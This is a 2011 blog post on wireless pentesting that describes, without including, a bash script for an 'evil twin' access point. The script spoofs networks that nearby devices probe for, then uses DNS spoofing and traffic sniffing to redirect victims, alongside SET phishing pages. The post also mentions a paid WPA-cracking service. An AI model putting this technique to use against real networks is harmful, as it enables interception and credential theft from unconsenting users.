Videos Section

Friday, 4 November 2011

A quick 'n' evil Access Point

I have been carrying out wireless assessments for some clients recently, and to be honest, if the client is security savvy enough to be requesting a wireless pentest, then usually (i said usually ;) they are savvy enough to have secured their network in a reasonable manner. Finding one setup with WEP is certainly not going to happen. If you are up against WPA/WPA2 then you should check out Elcomsoft's Wireless auditor, purely for its GPU support and password permutations.
Another good resource is http://tools.question-defense.com/wpa-password-cracker

They charge $10 to crack your WPA key, and have a huge dictionary of 1.5 billion words.

Anyway, suppose you have explored the aforementioned methods and have had little luck. Time for another way.....

The next best thing to cracking a wireless network key, is to be able to force the clients on that network to connect to your network. Various tools and techniques exist for this including karma, jasager, and the social engineering toolkit. I have had a varying amounts of success with these tools, and blindly running a tool without fully understanding exactly what is happening under the hood is often a bad idea, so i decided the best thing for me to do, is to go away and work my way through the excellent Wireless security megaprimer available here: http://www.securitytube.net/groups?operation=viewall&groupId=0
This course takes you through each step manually, so gives you a decent understanding of what processes make up this technique of coercing someone to connect to your wireless network.

Working through this course, I have realised, there are a great many commands to run through in order to get your fake access point up and running properley, so i have whipped up a bash script to automate all this. Feel free to make use of this, although make sure you have a basic knowledge of the process first, or better still, check out the securitytube training videos first.

Okay, this script was designed for those using backtrack within a VM with both a bridged connection through the host to provide internet access, and a wireless alfa card connected to host the fake access point.
I have also included in the script, the commands to resolve the SIOCSIFFLAGS error, common with the ALFA cards running under vmware.
I don't see why it wouldnt work in any other setup, basically you just need to copy it to your bactrack machine and chmod 755 to make it executable, and off you go.
It will setup a fake access point and also spoof any other access points that nearby computers are probing for. Once this is done it will finish by setting up Dsniff and DNSspoof and URLsnarf to redirect any connected clients to your own machine. I use this alongside the SET website attacks, and it works very well.